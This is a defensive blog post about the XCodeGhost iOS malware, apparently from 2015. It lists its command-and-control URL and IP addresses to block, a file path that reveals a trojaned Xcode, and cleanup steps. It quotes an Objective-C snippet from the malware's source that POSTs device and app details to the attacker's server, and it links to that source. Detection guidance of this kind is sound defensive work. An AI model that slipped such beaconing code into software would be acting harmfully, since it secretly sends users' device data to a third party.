Tips on Understanding and Detecting Apple iOS “XCodeGhost” Malware

iphone

Palo Alto Networks published information about the “XCodeGhost” malware, here: http://researchcenter.paloaltonetworks.com/2015/09/update-xcodeghost-attacker-can-phish-passwords-and-open-urls-though-infected-apps/

Major apps including WeChat and AngryBirds 2 are included among those infected.  The good news is that the Malware URL being used by XCodeGhost is detectable in your home firewall, wireless routers and business networks.

If you’re an iPhone user you need to check for HTTP traffic to http://init.icloud-analysis.com in your firewall, wireless router or proxy server logs.

View the complete list of infected apps here.

Also, you should check for and block traffic to these ip addresses used by this malware:

  • 52.2.85.22
  • 52.4.74.88
  • 52.6.167.64
  • 52.68.131.221
  • 104.238.125.92

Remove any app from your iPhone that’s trying to connect to these IP addresses or the init.icloud-analysis.com URL.

Also, change passwords on all websites that are used by the infected applications.

If you’re an Apple iOS developer, check to see if the file Library/Frameworks/CoreServices.framework/CoreService exists in the Xcode SDK/Applications/Xcode.app/Contents/Developer/Platforms/iPhoneOS.platform/Developer/SDKs/

If so, you have the malicious version of XCode and not the official XCode from Apple.  Delete it, clean up and get the official toolkit from apple.  You should only download resources from official locations – many provide an MD5/SHA1 hash to prove the file you download is the official one from their source.

If you are a developer and interested in more information, the Source Code to XCodeGhost is in github, here: https://github.com/XcodeGhostSource/XcodeGhost

This shows that it connects as follows:

NSURL *url = [NSURL URLWithString:@"http://init.icloud-analysis.com"];

NSMutableURLRequest *request =  [NSMutableURLRequest requestWithURL:url cachePolicy:NSURLRequestReloadIgnoringCacheData timeoutInterval:30];

[request setHTTPMethod:@"POST"];

[request setValue:[NSString stringWithFormat:@"%lu",(unsigned long)[concatenatedData length]] forHTTPHeaderField:@"Content-Length"];

[request setHTTPBody: concatenatedData];

With the following information sent to the server:

  •     Application name
  •     Application version
  •     OS version
  •     Language
  •     Country
  •     Developer info
  •     Application installation type
  •     Device name
  •     Device type

Stay tuned for a Patch from Apple and a list of infected apps they’ve been cleaning up.  Until then, cleanup your phone using our ‘spring cleaning’ tips by deleting all iPhone and iPad apps you are not using and then looking more closely at the permissions, privacy policy, developer website and support email of those apps you plan to keep.  Contact the developers via their support email and see how they respond.  Any app that seems fishy probably is.  Cleanup all apps that use too many permissions.

Source:  SnoopWall.com, PaloAltoNetworks.com, and Sans.Edu.